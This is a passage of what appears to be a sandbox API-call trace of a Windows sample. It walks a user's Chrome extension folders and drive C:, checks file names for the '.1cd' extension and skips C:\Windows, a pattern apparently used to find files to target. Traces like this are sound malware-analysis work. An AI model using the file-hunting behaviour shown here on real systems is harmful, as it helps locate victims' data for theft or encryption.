nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.812] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.812] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.812] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0052.812] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr") returned 139 [0052.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.813] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.813] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.813] lstrlenW (lpString="messages.json") returned 13 [0052.813] lstrlenW (lpString=".1cd") returned 4 [0052.813] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.813] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.813] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.813] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk", cAlternateFileName="")) returned 1 [0052.813] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk") returned 139 [0052.813] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\uk\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.815] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.815] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.816] lstrlenW (lpString="messages.json") returned 13 [0052.816] lstrlenW (lpString=".1cd") returned 4 [0052.816] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.816] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.816] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0052.816] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi") returned 139 [0052.816] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\vi\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.816] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d6650, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852d6650, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.816] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.816] lstrlenW (lpString="messages.json") returned 13 [0052.816] lstrlenW (lpString=".1cd") returned 4 [0052.816] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852d6650, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852d75f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.816] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.817] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_CN", cAlternateFileName="")) returned 1 [0052.817] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN") returned 142 [0052.817] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_CN\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.818] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.818] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.818] lstrlenW (lpString="messages.json") returned 13 [0052.818] lstrlenW (lpString=".1cd") returned 4 [0052.818] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.818] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.818] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.818] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 1 [0052.818] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW") returned 142 [0052.818] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\*", lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef16c0 [0052.818] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.818] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.818] lstrlenW (lpString="messages.json") returned 13 [0052.818] lstrlenW (lpString=".1cd") returned 4 [0052.819] FindNextFileW (in: hFindFile=0x3ef16c0, lpFindFileData=0x33fdcb4 | out: lpFindFileData=0x33fdcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.819] FindClose (in: hFindFile=0x3ef16c0 | out: hFindFile=0x3ef16c0) returned 1 [0052.819] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4032518 | out: hHeap=0x570000) returned 1 [0052.819] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh_TW", cAlternateFileName="")) returned 0 [0052.819] FindClose (in: hFindFile=0x3ef1600 | out: hFindFile=0x3ef1600) returned 1 [0052.819] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4022510 | out: hHeap=0x570000) returned 1 [0052.819] FindNextFileW (in: hFindFile=0x3ef15c0, lpFindFileData=0x33fe1ac | out: lpFindFileData=0x33fe1ac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0052.819] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.819] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x628aed00, ftLastWriteTime.dwHighDateTime=0x1d0f5b2, nFileSizeHigh=0x0, nFileSizeLow=0x2769, dwReserved0=0x0, dwReserved1=0x0, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 1 [0052.819] FindNextFileW (in: hFindFile=0x3ef1600, lpFindFileData=0x33fdf30 | out: lpFindFileData=0x33fdf30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85347ad0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x628aed00, ftLastWriteTime.dwHighDateTime=0x1d0f5b2, nFileSizeHigh=0x0, nFileSizeLow=0x2769, dwReserved0=0x0, dwReserved1=0x0, cFileName="verified_contents.json", cAlternateFileName="VERIFI~1.JSO")) returned 0 [0052.819] FindClose (in: hFindFile=0x3ef1600 | out: hFindFile=0x3ef1600) returned 1 [0052.819] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4022510 | out: hHeap=0x570000) returned 1 [0052.819] FindNextFileW (in: hFindFile=0x3ef15c0, lpFindFileData=0x33fe1ac | out: lpFindFileData=0x33fe1ac*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85348a70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85348a70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85348a70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0052.820] FindClose (in: hFindFile=0x3ef15c0 | out: hFindFile=0x3ef15c0) returned 1 [0052.820] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.822] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x33fe428 | out: lpFindFileData=0x33fe428*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x851f1e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85639950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4.2.8_0", cAlternateFileName="4278E1~1.8_0")) returned 0 [0052.822] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.822] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fd24e8 | out: hHeap=0x570000) returned 1 [0052.822] FindNextFileW (in: hFindFile=0x3ef1540, lpFindFileData=0x33fe6a4 | out: lpFindFileData=0x33fe6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x844bb8e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844c0700, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844c0700, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="felcaaldnbdncclmgdcncolpebgiejap", cAlternateFileName="FELCAA~1")) returned 1 [0052.908] FindNextFileW (in: hFindFile=0x3ef1640, lpFindFileData=0x33fe428 | out: lpFindFileData=0x33fe428*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x844bb8e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844c0700, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844c0700, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.909] FindNextFileW (in: hFindFile=0x3ef1640, lpFindFileData=0x33fe428 | out: lpFindFileData=0x33fe428*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8401b790, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x844b1ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x844b1ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1_0", cAlternateFileName="")) returned 1 Thread: id = 19 os_tid = 0xaf4 [0032.662] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39306d8 [0032.663] lstrlenW (lpString="C:") returned 2 [0032.663] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x353fd00 | out: lpFindFileData=0x353fd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x663220 [0032.663] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0032.663] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0032.663] lstrlenW (lpString="$Recycle.Bin") returned 12 [0032.663] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0032.663] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xfffe) returned 0x39406e0 [0032.663] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0032.663] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x353fa84 | out: lpFindFileData=0x353fa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x663260 [0032.664] 